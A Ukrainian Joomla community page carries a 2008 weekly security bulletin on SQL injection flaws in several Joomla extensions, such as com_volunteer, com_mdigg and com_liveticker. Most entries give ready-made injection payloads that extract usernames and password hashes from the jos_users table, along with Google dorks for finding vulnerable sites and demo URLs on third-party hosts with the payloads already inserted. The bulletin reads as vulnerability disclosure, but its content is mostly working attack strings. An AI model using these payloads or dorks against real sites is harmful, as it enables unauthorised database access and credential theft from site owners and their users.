Головна Статті та огляди Новини Форум Чат Wiki Продукти Контакти RSS Архів

Новини

Переклад

Українська локалізація для Joomla! 1.5.15 Stable

Українська локалізація для Joomla 1.0.15

Завантажити Joomla

Стабільна стара версія Joomla! 1.0.15

Форум

Хостинг для Joomla
Як вибрати хостинг? Реєстрація домену для сайту Реєструємо безкоштовно домен Яку платформу вибрати для Joomla: UNIX чи Windows?

Дискламація

Joomla!^TM є торговою маркою компанії Open Source Matters inc. в США та інших країнах. Назва Joomla! і його варіації, такі як J, Joom тощо, використовуються в рамках обмеженою ліцензії, певною компанією Open Source Matters. Спільнота Joomla! Україна не відноситься до компанії Open Source Matters або проекту Joomla! Точки зору представлені на даному сайті не є офіційними точками зору Joomla Project або Open Source Matters.

Торгова марка Joomla^® і логотип використовуються в рамках обмеженою ліцензії, наданої Open Source Matters.

Популяні розширення

Безкоштовні шаблони для Joomla 1.5

RokCodepress - заміна візуальному редактору

Модуль новин DGM NEWS ULTRA Plus Lite RC1

Новий реліз Community Builder

Інтеграція форуму phpBB 3.0 з Joomla 1.5

Joomla Flash Uploader - компонент для завантаження файлів

Уборка, химчистка Весь спектр: уборка дома квартиры.
скачать игры головоломки без sms

Головна Новини безпеки Тижневик безпеки №01

Тижневик безпеки №01

28.12.2008 | Dutch | Друк | E-mail

За тиждень, який минає знайдено вразливості у наступних розширеннях: mdigg 2.2.8, Live Ticker 1.0, Ice Gallery 0.5b2, com_allhotels, com_lowcosthotels, Volunteer 2.0.

com_volunteer (job_id) SQL-ін’єкція

Приклад:

http://localhost/Path/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=[exploit]

Експойт:

-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--

Демо:

http://demolegacy.joomlaapps.com/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--&filter=&city_id=&function_id=&limit=5&pageno=1

com_lowcosthotels (id) SQL-ін’єкція

Скрипт: http://www.joomlahbs.com/

DorK: inurl:index.php?option=com_lowcosthotels

Демо:

com_allhote

http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5

http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4%20%20%20

http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5

ls (id) SQL-ін’єкція

Скрипт:

http://www.joomlahbs.com/ та http://www.leveltensolutions.net/spa/

DorK: inurl:index.php?option=com_allhotels

Демо:

http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5

com_ice (catid) SQL-ін’єкція

Приклад:

http://localHost/path/index.php?option=com_ice&⁞catid=1[SQL code]

SQL код:

and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96

com_liveticker (tid) SQL-ін’єкція

Приклад:

http://localHost/path/index.php?option=com_liveticker&task=viewticker&tid=[SQL]

Демо:

http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=4   >>(False)

http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=5   >>(True)

com_mdigg (category) SQL-ін’єкція

Приклад:

http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]

Експойт:

-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*

свой логотип на жалюзи

Додати коментар

JComments

Використання матеріалів сайту можливе лише при згоді адміністрації та активного посилання. Всі права захищено!